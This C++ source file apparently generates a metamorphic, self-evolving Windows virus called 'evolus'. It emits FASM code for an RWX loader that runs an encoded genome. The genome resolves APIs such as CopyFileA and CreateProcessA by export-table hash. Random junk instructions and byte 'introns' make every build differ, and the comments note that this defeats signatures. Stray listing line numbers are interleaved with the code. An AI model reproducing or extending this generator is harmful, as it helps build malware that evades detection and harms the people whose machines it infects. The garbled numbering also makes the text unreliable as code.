#include <cstdlib>
#include <ctime>
#include <math.h>
#include <stdio.h>

#include <algorithm>
#include <fstream>
#include <iostream>
#include <list>
#include <sstream>
#include <string>
#include <vector>

#include <windows.h>
#include <tchar.h>
11
12using namespace std;
13
// Output stream for the generated FASM source. Every emitter below appends to
// it; main() opens it (as "evolus.asm") before any emitter runs, so calling an
// emitter earlier silently writes to a closed stream.
ofstream file;
15
// Render a number as text using the default ostream formatting
// (5 -> "5", 2.5 -> "2.5", -3 -> "-3"; very large values may print in
// scientific notation). Used to emit `db` operands.
std::string I2S(double n)
{
    std::ostringstream text;
    text << n;
    return text.str();
}
23
24
// Forward declarations for the genome emitters defined below.
//
// Context for a reader: this program is a *generator*. main() writes a FASM
// source file whose loader stub allocates PAGE_EXECUTE_READWRITE memory with
// VirtualAlloc, copies a byte-encoded "genome" into it and calls it; the
// genome itself resolves kernel32/advapi32 exports by walking the export table
// and comparing a 12-bit hash against hard-coded values (see the comment block
// and the mCloseHandle/mCopyFileA/... constants emitted in main()).
// The routines below emit genome fragments as `_xxx` macro invocations whose
// semantics live in the included .inc files, not in this file; the inline `;`
// comments carried in the emitted text are the only description of them here.
// All emitters write to the global `file` and return nothing.
void addnumber(string BigNum);
void GetAddress(string address);
void CallAPI(string APIName);
void CalcNewRandNumberAndSaveIt();
void nopdC();
void nopsC();
void zer0(int rr);
void subsaved(int rr);
33
34
// Probability knob for CreateAnIntron(): an intron is emitted on roughly one
// call in IntronInsertThreshold (i.e. when rand()%11 == 0).
#define IntronInsertThreshold 11
// Counters for the two intron flavours; main() zeroes them before generating.
int IntronSTST;
int IntronNOP;

// Emit a random "intron" -- a filler sequence inside the genome byte stream.
// With probability 10/11 nothing is written. Otherwise one of two shapes:
//   * 5 times in 6: `db StopCodon`, then a run of random data bytes
//     `(rand()%255)^0x67` (the run continues while rand()%31 != 0),
//     then `db StartCodon`. The splicing loop in main() ORs 0x91 into every
//     codon it sees between a StopCodon and the next StartCodon.
//   * 1 time in 6: a run of `_nopREAL` macro lines of the same random length.
// Everything here is driven by rand(), which main() seeds from time(NULL), so
// the byte layout of these regions differs on every run of the generator; a
// signature for the produced binary should not depend on anything emitted here.
void CreateAnIntron()
{
    if (!(rand()%IntronInsertThreshold))
    {
        if (rand()%6)
        {
            // Here we use START+STOP intron: StopCodon, random bytes, StartCodon
            file << "db StopCodon" << endl;
            while(rand()%31)
            {
                // rand()%255 is 0..254; XOR with 0x67 keeps it a single byte.
                file << "db " << I2S((rand()%255)^0x67) << endl;
            }
            file << "db StartCodon" << endl;
            IntronSTST++;
        }
        else
        {
            while(rand()%31)
            {
                // Older variant emitted raw bytes with the 0x91 bits set:
                //file << "db " << I2S((rand()%255)|0x91) << endl;
                file << "_nopREAL" << endl;
            }
            IntronNOP++;
        }
    }
}
66
// Emit genome code that adds the assembly-time constant `BigNum` to the
// genome's first working register ("BC1" in the emitted comments).
//
// `BigNum` is written verbatim as a FASM symbol assignment, so it may be a
// literal ("12345"), a character constant ("'kern'") or an address expression
// such as "mCloseHandle-DataOffset" built by GetAddress(); FASM resolves it.
// Two code shapes are produced and the assembler picks one with `if`:
//   * BigNum < 25: `repeat BigNum` of `_add0001` (unit increments).
//   * otherwise: BC1 is pushed, a fresh value is built bit by bit from the
//     32 masks in the `irp` list (shift left, then add one when the bit is
//     set), saved into BC2, BC1 is popped and `_addsaved` performs the add.
//     The trailing nopdC()/_popall/nopsC() and the "_pushall/_save/_and/_popall"
//     tail are, per the emitted comments, there to restore the other registers
//     and ZF; the exact macro semantics are defined in the .inc files.
// Random introns are sprinkled between most lines via CreateAnIntron().
void addnumber(string BigNum)
{
    file << " BigNum=" << BigNum << endl;
    file << " AlreadyStarted=0" << endl; CreateAnIntron();
    file << " if BigNum<25" << endl; CreateAnIntron();
    // Small constants: just repeat the unit increment.
    file << " repeat BigNum" << endl;
    file << " _add0001" << endl;
    file << " end repeat" << endl;
    file << " else" << endl;
    file << " _pushall" << endl; CreateAnIntron();
    file << " _push ; BC1 to stack" << endl;
    file << " _save" << endl; CreateAnIntron();
    file << " _xor ; BC1=0" << endl;
    file << " _add0001" << endl; CreateAnIntron();
    file << " _save" << endl;
    file << " _sub0001 ; BC1=0, BC2=1" << endl; CreateAnIntron();
    // Assembly-time loop over bit masks, MSB first; `_shl` only once a set
    // bit has been seen (AlreadyStarted), `_add0001` for each set bit.
    file << " irp num, 0x80000000,0x40000000,0x20000000,0x10000000,0x8000000,0x4000000,0x2000000,0x1000000,0x800000,0x400000,0x200000,0x100000,0x80000,0x40000,0x20000,0x10000,0x8000,0x4000,0x2000,0x1000,0x800,0x400,0x200,0x100,0x80,0x40,0x20,0x10,0x8,0x4,0x2,0x1" << endl;
    file << " {" << endl;
    file << " if AlreadyStarted=1" << endl;
    file << " _shl" << endl;
    file << " end if" << endl;
    file << " if (BigNum AND num)>0" << endl;
    file << " _add0001" << endl;
    file << " AlreadyStarted=1" << endl;
    file << " end if" << endl;
    file << " }" << endl;
    file << " _save ; BC2=BigNum" << endl; CreateAnIntron();
    file << " _pop ; restore BC1" << endl;
    file << " _addsaved ; BC1=BC1+BigNum" << endl; CreateAnIntron();
    // Preserve BC1 across the register restore (see nopdC/nopsC).
    nopdC();
    file << " _popall ; Restore all registers" << endl;
    nopsC();
    file << " _pushall ; Restore ZF" << endl; CreateAnIntron();
    file << " _save" << endl;
    file << " _and" << endl;
    file << " _popall" << endl;
    file << " end if" << endl;

}
106
107
108
// Emit genome code that leaves the address of data symbol `address` in BC1:
// `_getDO` followed by addnumber("<address>-DataOffset"). Presumably `_getDO`
// loads the data-section base so base + (address-DataOffset) == address --
// inferred from the macro name and the way every caller uses it; confirm
// against the macro include.
void GetAddress(string address)
{
    file << " _getDO" << endl; CreateAnIntron();
    string tmpstr=address+"-DataOffset"; CreateAnIntron();
    addnumber(tmpstr);
}
115
116
// Emit genome code that calls through the function pointer stored at data
// symbol `APIName`: same address computation as GetAddress(), then `_getdata`
// (dereference) and `_call`. Not invoked from the part of main() visible here.
void CallAPI(string APIName)
{
    file << " _getDO" << endl; CreateAnIntron();
    string tmpstr=APIName+"-DataOffset";
    addnumber(tmpstr); CreateAnIntron();
    file << " _getdata" << endl;
    file << " _call" << endl; CreateAnIntron();
}
125
// Emit genome code that advances a linear congruential generator stored at
// data symbol `RandomNumber`: per the emitted comments,
//   x = [RandomNumber]; x = x*1103515245 + 12345 (mod 2^32); [RandomNumber] = x.
// (1103515245 / 12345 are the textbook ANSI C rand() constants.) The write
// target is fixed with `_saveWrtOff` before the arithmetic and consumed by
// `_writeDWord` at the end. Not invoked from the part of main() visible here.
void CalcNewRandNumberAndSaveIt()
{
    GetAddress("RandomNumber");
    file << " _saveWrtOff" << endl; CreateAnIntron();
    file << " _getdata" << endl; CreateAnIntron();
    file << " _nopdA ; eax=[RandomNumber]" << endl; CreateAnIntron();
    zer0(0);
    addnumber("1103515245");
    file << " _mul ; eax*=1103515245 % 2^32" << endl; CreateAnIntron();
    zer0(0);
    addnumber("12345"); CreateAnIntron();
    file << " _save" << endl;
    file << " _nopsA" << endl; CreateAnIntron();
    file << " _addsaved ; eax+=12345 % 2^32" << endl;
    file << " _writeDWord ; mov [RandomNumber], ebx" << endl; CreateAnIntron();
}
142
// Emit genome code that spills BC1 into the data slot "RegC" (per the emitted
// comments: `mov dword[RegC], BC1`, RegC living at DataOffset+0) while
// preserving every register with `_pushall`/`_popall`. Paired with nopsC(),
// which reloads it; together they carry BC1 across a `_popall` that would
// otherwise clobber it. Introns are inserted after every line.
void nopdC()
{
    file << " _pushall ; save all registers" << endl; CreateAnIntron();
    file << " _push ; save BC1" << endl; CreateAnIntron();
    file << " _getDO ; For code-optimization, RegC is at DataOffset+0x0. But could be anywhere as _add0001 exists." << endl; CreateAnIntron();
    file << " _saveWrtOff ; BA1=RegC" << endl; CreateAnIntron();
    file << " _pop" << endl; CreateAnIntron();
    file << " _writeDWord ; mov dword[RegC], BC1" << endl; CreateAnIntron();
    file << " _popall ; restore all registers" << endl; CreateAnIntron();
}
153
154
// Emit genome code that reloads BC1 from the "RegC" data slot written by
// nopdC(): `_getDO` (data base, which the emitted comment says is RegC itself)
// followed by `_getdata`.
void nopsC()
{
    file << " _getDO ; For code-optimization, RegC is at DataOffset+0x0. But could be anywhere as _add0001 exists." << endl; CreateAnIntron();
    file << " _getdata" << endl; CreateAnIntron();
}
160
161
162
// Emit genome code that zeroes BC1 (`_save` copies BC1 to BC2, `_xor` then
// yields BC1 XOR BC1 = 0, per the emitted comments).
//
// rr != 0: wrap the sequence in `_pushall`/`_popall` so BC2 and the other
//          registers keep their values; BC1 is carried across the `_popall`
//          through nopdC()/nopsC(), so the caller still sees BC1 == 0.
// rr == 0: bare sequence -- BC2 is overwritten with the old BC1.
// Note these lines are emitted without the leading space the other emitters
// use; that is cosmetic for FASM.
void zer0(int rr)
{
    if (rr!=0)
    {
        file << "_pushall" << endl; CreateAnIntron();
    }

    file << "_save ; BC2=BC1" << endl; CreateAnIntron();
    file << "_xor ; BC1=BC1 XOR BC2 = 0" << endl; CreateAnIntron();

    if (rr!=0)
    {
        nopdC();
        file << "_popall" << endl;
        nopsC(); CreateAnIntron();
    }
}
180
181
// Emit genome code computing BC1 = BC1 - BC2 using only the add/xor/inc/dec
// style primitives the genome has: BC1 is pushed, zeroed (zer0(1) keeps BC2),
// turned into 0xFFFFFFFF, XORed with BC2 and incremented -- i.e. two's
// complement negation of BC2 -- then `_save`d into BC2 and added to the
// restored BC1 with `_addsaved` (all per the emitted comments).
//
// rr != 0 additionally preserves the remaining registers and ZF around the
// whole sequence (same `_pushall` ... nopdC/_popall/nopsC ... tail as
// addnumber()). Not invoked from the part of main() visible here.
void subsaved(int rr)
{
    if (rr!=0)
    {
        file << " _pushall" << endl; CreateAnIntron();
    }
    file << " _push ; save BC1" << endl; CreateAnIntron();
    zer0(1);
    file << " _sub0001 ; BC1=0xFFFFFFFF" << endl; CreateAnIntron();
    file << " _xor ; BC1=0xFFFFFFFF XOR BC2" << endl; CreateAnIntron();
    file << " _add0001 ; BC1=-BC2" << endl; CreateAnIntron();
    file << " _save ; BC2=-BC2" << endl; CreateAnIntron();
    file << " _pop ; restore BC1" << endl; CreateAnIntron();
    file << " _addsaved ; BC1=BC1+(-BC2)" << endl; CreateAnIntron();

    if (rr!=0)
    {
        CreateAnIntron();
        nopdC(); CreateAnIntron();
        file << " _popall" << endl; CreateAnIntron();
        nopsC(); CreateAnIntron();
        file << " _pushall ; Restore ZF" << endl; CreateAnIntron();
        file << " _save" << endl; CreateAnIntron();
        file << " _and" << endl; CreateAnIntron();
        file << " _popall" << endl; CreateAnIntron();
    }
}
209
210
211
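// Remove every occurrence of `Element` from `*List` in place and return a copy
// of the result (callers assign it back, which is harmless).
//
// An empty `Element` is a no-op: CreateIntronTranslator() passes "" for its
// unused register slots. `List` must be non-null (every caller passes the
// address of a local vector).
//
// Fix: the original erased inside its own iteration loop (skipping the element
// after each hit, so consecutive duplicates survived) and finished with
// `List->erase(List->end())`, which is undefined behaviour. The erase-remove
// idiom removes all matches without touching an invalidated iterator.
std::vector<std::string> RemoveElement(std::vector<std::string> *List, std::string Element)
{
    if (Element!="")
    {
        List->erase(std::remove(List->begin(), List->end(), Element), List->end());
    }
    return(*List);
}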
225
// Probability knob for CreateIntronTranslator(): junk is emitted on one call in
// TranslatorIntron (rand()%2 == 0).
#define TranslatorIntron 2
// Number of junk sequences emitted so far (zeroed in main()).
int cIntronN;

// Emit a random run of do-nothing x86 instructions into the *loader stub* (the
// plain assembly in main() that VirtualAllocs RWX memory and copies the genome
// in), as opposed to CreateAnIntron(), which works on the genome byte stream.
//
// El1..El8 name registers the stub is currently using; they are removed from
// the pool of writable registers (EAX,EBX,ECX,EDX,EDI,ESI,EBP -- ESP is never
// written, but appears in AllReg as a read-only source). Passing "" for a slot
// excludes nothing.
//
// wFlags == true  : only forms that leave EFLAGS untouched (nop, mov, xchg,
//                   push/pop). main() uses this right after its `cmp` lines.
// wFlags == false : additionally add/sub/xor/and/or/cmp/test, inc/dec and
//                   shr/shl (immediate 0..255 or `cl`), all of which write
//                   EFLAGS.
// Each run continues while rand()%13 != 0. Review notes:
//   * the wFlags branch draws rr from rand()%8 (0..7), so its `rr==8` case is
//     unreachable; in both branches rr==3 emits nothing (harmless, just a
//     slightly different distribution than the code suggests);
//   * `rand()%UnUsedReg.size()` divides by zero if a caller excludes all seven
//     writable registers. Callers in this file exclude at most six.
void CreateIntronTranslator(bool wFlags=0, string El1="", string El2="", string El3="", string El4="", string El5="", string El6="", string El7="", string El8="")
{
// cout << wFlags << wEAX << wEBX << wECX << wEDX << wEBP << wESI << wEDI << endl << "- - -" << endl;
    // Any register may be read as a source operand, ESP included.
    vector<string> AllReg;
    AllReg.push_back("EAX"); AllReg.push_back("EBX"); AllReg.push_back("ECX"); AllReg.push_back("EDX");
    AllReg.push_back("EDI"); AllReg.push_back("ESI"); AllReg.push_back("EBP"); AllReg.push_back("ESP");

    // Registers the junk is allowed to overwrite: everything but ESP and the
    // caller's protected registers.
    vector<string> UnUsedReg;
    UnUsedReg.push_back("EAX"); UnUsedReg.push_back("EBX"); UnUsedReg.push_back("ECX"); UnUsedReg.push_back("EDX");
    UnUsedReg.push_back("EDI"); UnUsedReg.push_back("ESI"); UnUsedReg.push_back("EBP");
    UnUsedReg=RemoveElement(&UnUsedReg,El1);
    UnUsedReg=RemoveElement(&UnUsedReg,El2);
    UnUsedReg=RemoveElement(&UnUsedReg,El3);
    UnUsedReg=RemoveElement(&UnUsedReg,El4);
    UnUsedReg=RemoveElement(&UnUsedReg,El5);
    UnUsedReg=RemoveElement(&UnUsedReg,El6);
    UnUsedReg=RemoveElement(&UnUsedReg,El7);
    UnUsedReg=RemoveElement(&UnUsedReg,El8);

    // Instruction menus for the flag-clobbering branch.
    vector<string> ArithOp2Arg;
    ArithOp2Arg.push_back("add");
    ArithOp2Arg.push_back("sub");
    ArithOp2Arg.push_back("xor");
    ArithOp2Arg.push_back("and");
    ArithOp2Arg.push_back("or");
    ArithOp2Arg.push_back("cmp");
    ArithOp2Arg.push_back("test");

    vector<string> ArithOp1Arg;
    ArithOp1Arg.push_back("inc");
    ArithOp1Arg.push_back("dec");

    vector<string> ShiftVec;
    ShiftVec.push_back("shr");
    ShiftVec.push_back("shl");


    if (!(rand()%TranslatorIntron))
    {
        cIntronN++;

        if (wFlags)
        {
            // Flag-preserving junk only.
            while (rand()%13)
            {
                int rr=rand()%8;
                if (rr<3) { file << "nop" << endl; }
                if (rr==4) { file << "mov " << UnUsedReg[rand()%UnUsedReg.size()] << "," << AllReg[rand()%AllReg.size()] << endl; }
                if (rr==5) { file << "mov " << UnUsedReg[rand()%UnUsedReg.size()] << "," << rand() << endl; }
                if (rr==6) { file << "xchg " << UnUsedReg[rand()%UnUsedReg.size()] << "," << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
                if (rr==7) { file << "push " << AllReg[rand()%AllReg.size()] << endl << "pop " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
                // Unreachable: rr is at most 7 here.
                if (rr==8) { file << "push " << rand() << endl << "pop " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
            }
        }
        else
        {
            // Same menu plus arithmetic and shifts (these write EFLAGS).
            while (rand()%13)
            {
                int rr=rand()%25;
                if (rr<3) { file << "nop" << endl; }
                if (rr==4) { file << "mov " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << AllReg[rand()%(AllReg.size())] << endl; }
                if (rr==5) { file << "mov " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << rand() << endl; }
                if (rr==6) { file << "xchg " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
                if (rr==7) { file << "push " << AllReg[rand()%(AllReg.size())] << endl << "pop " << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
                if (rr==8) { file << "push " << rand() << endl << "pop " << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
                if (rr>8 && rr<=13) { file << ArithOp2Arg[rand()%ArithOp2Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << "," << AllReg[rand()%AllReg.size()] << endl; }
                if (rr>13 && rr<=16) { file << ArithOp2Arg[rand()%ArithOp2Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << "," << rand() << endl; }
                if (rr>16 && rr<=20) { file << ArithOp1Arg[rand()%ArithOp1Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
                // Shift count 0..255 as an immediate; the CPU masks it to 5 bits.
                if (rr>20 && rr<=23) { file << ShiftVec[rand()%ShiftVec.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << ", " << rand()%(0x100) << endl; }
                if (rr>23) { file << ShiftVec[rand()%ShiftVec.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << ", cl" << endl; }
            }
        }
    }
}
302
303
// Emit one of four equivalent ways of zeroing the 32-bit register `Reg` into
// the loader stub (chosen with rand()%4). The forms are value-equivalent but
// not flag-equivalent: `xor`/`sub` write EFLAGS, `mov` and `push 0`/`pop` do
// not -- callers that care about flags must not rely on this helper.
void ZeroRegister(string Reg)
{
    int rr=rand()%4;
    if (rr==0)
    {
        file << "mov " << Reg << ",0" << endl;
    }
    if (rr==1)
    {
        file << "xor " << Reg << "," << Reg << endl;
    }
    if (rr==2)
    {
        file << "sub " << Reg << "," << Reg << endl;
    }
    if (rr==3)
    {
        file << "push 0" << endl << "pop " << Reg << endl;
    }
}
324
325
// Emit one of five equivalent ways of loading the immediate `Num` into `Reg`
// in the loader stub: a plain `mov`, or ZeroRegister() followed by
// `add`/`sub -Num`/`xor`/`or`. Only the plain `mov` leaves EFLAGS alone.
//
// Caveat: variant 2 prints `-` directly in front of Num, so a negative Num
// would emit `sub Reg,--N`. Callers in this file pass 0x91 and 8 only.
void MovRegNum(string Reg, int Num)
{
    int rr=rand()%5;
    if (rr==0)
    {
        file << "mov "<< Reg << "," << Num << endl;
    }
    if (rr==1)
    {
        ZeroRegister(Reg);
        file << "add "<< Reg << "," << Num << endl;
    }
    if (rr==2)
    {
        ZeroRegister(Reg);
        // 0 - (-Num) == Num; see the negative-Num caveat above.
        file << "sub "<< Reg << ",-" << Num << endl;
    }
    if (rr==3)
    {
        ZeroRegister(Reg);
        file << "xor "<< Reg << "," << Num << endl;
    }
    if (rr==4)
    {
        ZeroRegister(Reg);
        file << "or "<< Reg << "," << Num << endl;
    }
}
354
// Emit loader-stub code computing Reg = Address + Num, either as
// `mov Reg,Address` / `add Reg,Num` or as `lea Reg,[Address+Num]`.
// Both operands are written verbatim, so `Num` need not be a number: main()
// passes a register name (the codon register) to index the alphabet table.
// In the `lea` form the preceding ZeroRegister() is dead work (lea overwrites
// Reg) -- it only diversifies the output. The `mov`/`add` form writes EFLAGS,
// the `lea` form does not (unless ZeroRegister() picked a flag-writing form).
void Lea(string Reg, string Address, string Num)
{
    int rr=rand()%2;
    if (rr==0)
    {
        file << "mov "<< Reg << "," << Address << endl;
        file << "add "<< Reg << "," << Num << endl;
    }
    if (rr==1)
    {
        ZeroRegister(Reg);
        file << "lea "<< Reg << ",[" << Address << "+" << Num << "]" << endl;
    }
}
369
370int main()
371{
372 // Get the list of process identifiers.
373 cout << "\nCreate evolus with introns\n" << endl;
374 cout << "**************************\n\n" << endl;
375IntronSTST=0;
376IntronNOP=0;
377cIntronN=0;
378 srand ( time(NULL) );
379
380
381 file.open("evolus.asm");
382
383 vector<string> UseReg;
384 UseReg.push_back("EAX"); UseReg.push_back("EBX"); UseReg.push_back("EDX");
385
386 string SplicSepX=UseReg[rand()%UseReg.size()]; string SplicSepL=SplicSepX.substr(1,1)+"L"; UseReg=RemoveElement(&UseReg,SplicSepX);
387// cout << "SplicSepX: " << SplicSepX << endl;
388
389 UseReg.push_back("ECX");
390 string CodonContX=UseReg[rand()%UseReg.size()]; string CodonContL=CodonContX.substr(1,1)+"L"; UseReg=RemoveElement(&UseReg,CodonContX);
391// cout << "CodonContX: " << CodonContX << endl;
392
393 UseReg.push_back("EBP"); UseReg=RemoveElement(&UseReg,"ECX");
394 string CodonCount=UseReg[rand()%UseReg.size()]; UseReg=RemoveElement(&UseReg,CodonCount);
395// cout << "CodonCount: " << CodonCount << endl;
396
397 UseReg.push_back(CodonContX); UseReg.push_back("ECX");
398 string TmpReg=UseReg[rand()%UseReg.size()];
399// cout << "TmpReg: " << TmpReg << endl;
400// cin.get();
401
402
403file << "include " << static_cast<char>(39) << "E:" << static_cast<char>(92) << "Programme" << static_cast<char>(92) << "FASM" << static_cast<char>(92) << "INCLUDE" << static_cast<char>(92) << "win32ax.inc" << static_cast<char>(39) << "" << endl;
404file << "" << endl;
405file << "RndNum = %t AND 0xFFFF" << static_cast<char>(39) << "FFFF" << endl;
406file << "macro GetNewRandomNumber" << endl;
407file << "{" << endl;
408file << " RndNum = ((RndNum*214013+2531011) AND 0xFFFF" << static_cast<char>(39) << "FFFF)" << endl;
409file << "}" << endl;
410file << "" << endl;
411file << ".data" << endl;
412file << " include " << static_cast<char>(39) << "data_n_equs.inc" << static_cast<char>(39) << "" << endl;
413file << "; a db " << static_cast<char>(34) << "Am I allowed to live?" << static_cast<char>(34) << ",0x0" << endl;
414file << "; b db " << static_cast<char>(34) << "In evolution we trust" << static_cast<char>(34) << ",0x0" << endl;
415file << "" << endl;
416file << "" << endl;
417file << ".code" << endl;
418file << "start:" << endl;
419while(rand()%11){ CreateIntronTranslator(); }
420file << "" << endl; CreateIntronTranslator();
421file << " AlignedSize=0x1" << static_cast<char>(39) << "0000" << endl;
422file << " while ((EndAmino-StAmino)*8)>AlignedSize" << endl;
423file << " AlignedSize=AlignedSize+0x1" << static_cast<char>(39) << "0000" << endl;
424file << " end while" << endl;
425file << "" << endl; CreateIntronTranslator();
426file << " push PAGE_EXECUTE_READWRITE" << endl; CreateIntronTranslator();
427file << " push 0x1000" << endl;CreateIntronTranslator();
428file << " push AlignedSize" << endl; CreateIntronTranslator();
429file << " push 0x0" << endl; CreateIntronTranslator();
430file << " stdcall [VirtualAlloc]" << endl; CreateIntronTranslator(0, "EAX");
431file << " mov [Place4Life], eax" << endl; CreateIntronTranslator();
432ZeroRegister(SplicSepX); CreateIntronTranslator(0, SplicSepX);
433ZeroRegister(CodonCount); CreateIntronTranslator(0, SplicSepX, CodonCount);
434file << " WriteMoreToMemory:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
435ZeroRegister(CodonContX); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
436file << " mov " << CodonContL << ", byte[" << CodonCount << "+StAmino]" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
437file << " cmp " << CodonContL << ", StartCodon " << endl; CreateIntronTranslator(1, SplicSepX, CodonCount, CodonContX);
438file << " jne SplicingNoStart" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
439ZeroRegister(SplicSepX); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
440file << " SplicingNoStart:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
441file << " cmp " << CodonContL << ", StopCodon" << endl; CreateIntronTranslator(1, SplicSepX, CodonCount, CodonContX);
442file << " jne SplicingNoStop" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
443MovRegNum(SplicSepX, 0x91); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
444file << " SplicingNoStop:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
445file << " or " << CodonContL << ", " << SplicSepL << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
446file << " shl " << CodonContX << ", 3" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
447Lea("ESI", "StartAlphabeth", CodonContX);
448file << " mov " << TmpReg << "," << CodonCount << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI");
449file << " shl " << TmpReg << ", 3" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI");
450file << " mov edi, [Place4Life]" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI", "EDI");
451file << " add edi, " << TmpReg << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, "ESI", "EDI");
452MovRegNum("ECX", 8); CreateIntronTranslator(0, SplicSepX, CodonCount, "ESI", "EDI", "ECX");
453file << " rep movsb" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
454file << " inc " << CodonCount << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
455file << " cmp " << CodonCount << ", (EndAmino-StAmino)" << endl; CreateIntronTranslator(1, SplicSepX, CodonCount);
456file << " jne WriteMoreToMemory" << endl; CreateIntronTranslator();
457while(rand()%11){ CreateIntronTranslator(); }
458file << " call [Place4Life] ; Lets start!!!" << endl; CreateIntronTranslator();
459file << "" << endl;
460while(rand()%11){ CreateIntronTranslator(); }
461file << "" << endl;
462file << "" << endl;
463file << "" << endl;
464file << "; ##################################################################" << endl;
465file << "; Alphabeth" << endl;
466file << "StartAlphabeth:" << endl;
467file << "include " << static_cast<char>(39) << "alphabeth.inc" << static_cast<char>(39) << "" << endl;
468file << "CreateAlphabet" << endl;
469file << "" << endl;
470file << "EndAlphabeth:" << endl;
471file << "" << endl;
472file << "; ##################################################################" << endl;
473file << "" << endl;
474//file << "include " << static_cast<char>(39) << "instruction_set_macros.inc" << static_cast<char>(39) << "" << endl;
475file << "" << endl;
476file << "; ##################################################################" << endl;
477file << "; Amino Acids" << endl;
478for (int i=0; i<500; i++) { CreateAnIntron(); }
479file << "StAmino:" << endl;
480for (int i=0; i<500; i++) { CreateAnIntron(); }
481file << "" << endl;
482file << "; ############################################################################" << endl;
483file << "; ############################################################################" << endl;
484file << "; ############################################################################" << endl;
485file << "; #####" << endl;
486file << "; ##### Here the genom gets the Addresses of the Windows APIs." << endl;
487file << "; ##### It loads via LoadLibrary the kernel32.dll and advapi32.dll," << endl;
488file << "; ##### searchs in the Export Table for the adequade API (creating" << endl;
489file << "; ##### an internal 12 bit checksum, and compares it with some hardcoded" << endl;
490file << "; ##### 12bit values). This procedere should be evolvable." << endl;
491file << "; #####" << endl;
492file << "; ##### Optimum would have been to call the Windows APIs by its" << endl;
493file << "; ##### Ordinal Numbers, but they change at every release of Windows." << endl;
494file << "; #####" << endl;
495file << "; ##### At Linux, evolvable API calls are already presented, as you" << endl;
496file << "; ##### call int 0x80 with a specific number in eax which represents" << endl;
497file << "; ##### the API number." << endl;
498file << "; #####" << endl;
499file << "; #####" << endl;
500file << ";" << endl;
501file << "; The Hash-Algo is equivalent to:" << endl;
502file << "; ===============================" << endl;
503file << ";" << endl;
504file << ";;FindAPIGiveMeTheHash:" << endl;
505file << ";; In: ebx=pointer to API name" << endl;
506file << ";; Out: eax=Hash (in ax)" << endl;
507file << ";; changed: eax" << endl;
508file << ";; mov ebx, apistr" << endl;
509file << ";" << endl;
510file << "; push ebx" << endl;
511file << "; push ecx" << endl;
512file << "; push edx" << endl;
513file << "; xor eax, eax" << endl;
514file << "; xor ecx, ecx" << endl;
515file << "; dec ebx" << endl;
516file << "; FindAPIGiveMeTheHashMore:" << endl;
517file << "; inc ebx" << endl;
518file << "; mov ecx, dword[ebx]" << endl;
519file << "; xor eax, ecx" << endl;
520file << "; mov edx, ecx ; ecx=nooo - n ... new byte" << endl;
521file << "; shr edx, 8 ; edx=000n ... new byte" << endl;
522file << "; cmp dl, 0 ; dl=n" << endl;
523file << "; jne FindAPIGiveMeTheHashMore" << endl;
524file << ";" << endl;
525file << "; and eax, 0x0FFF" << endl;
526file << "; pop edx" << endl;
527file << "; pop ecx" << endl;
528file << "; pop ebx" << endl;
529file << ";ret" << endl;
530file << "" << endl;
531file << "" << endl;
532file << "" << endl;
533file << "StAminoAcids1:" << endl;
534file << "; repeat 100" << endl;
535file << "; _nopREAL" << endl;
536file << "; end repeat" << endl;
537file << "" << endl;
538file << "" << endl;
539file << " db _START" << endl;
540file << " db _STOP" << endl;
541file << "" << endl;
542file << " db _START" << endl;
543file << "" << endl;
544GetAddress("mCloseHandle");
545file << " _saveWrtOff" << endl; CreateAnIntron();
546zer0(0);
547addnumber("0x0342");
548file << " _writeDWord" << endl; CreateAnIntron();
549file << "" << endl;
550GetAddress("mCopyFileA");
551file << " _saveWrtOff" << endl; CreateAnIntron();
552zer0(0);
553addnumber("0x0C5C");
554file << " _writeDWord" << endl; CreateAnIntron();
555file << "" << endl;
556GetAddress("mCreateFileA");
557file << " _saveWrtOff" << endl; CreateAnIntron();
558zer0(0);
559addnumber("0x0615");
560file << " _writeDWord" << endl; CreateAnIntron();
561file << "" << endl;
562GetAddress("mCreateFileMappingA");
563file << " _saveWrtOff" << endl; CreateAnIntron();
564zer0(0);
565addnumber("0x04E1");
566file << " _writeDWord" << endl; CreateAnIntron();
567file << "" << endl;
568GetAddress("mCreateProcessA");
569file << " _saveWrtOff" << endl; CreateAnIntron();
570zer0(0);
571addnumber("0x0674");
572file << " _writeDWord" << endl; CreateAnIntron();
573file << "" << endl;
574GetAddress("mGetDriveTypeA");
575file << " _saveWrtOff" << endl; CreateAnIntron();
576zer0(0);
577addnumber("0x0AFD");
578file << " _writeDWord" << endl; CreateAnIntron();
579file << "" << endl;
580GetAddress("mGetCommandLineA");
581file << " _saveWrtOff" << endl; CreateAnIntron();
582zer0(0);
583addnumber("0x06A8");
584file << " _writeDWord" << endl; CreateAnIntron();
585file << "" << endl;
586GetAddress("mGetFileSize");
587file << " _saveWrtOff" << endl; CreateAnIntron();
588zer0(0);
589addnumber("0x083B");
590file << " _writeDWord" << endl; CreateAnIntron();
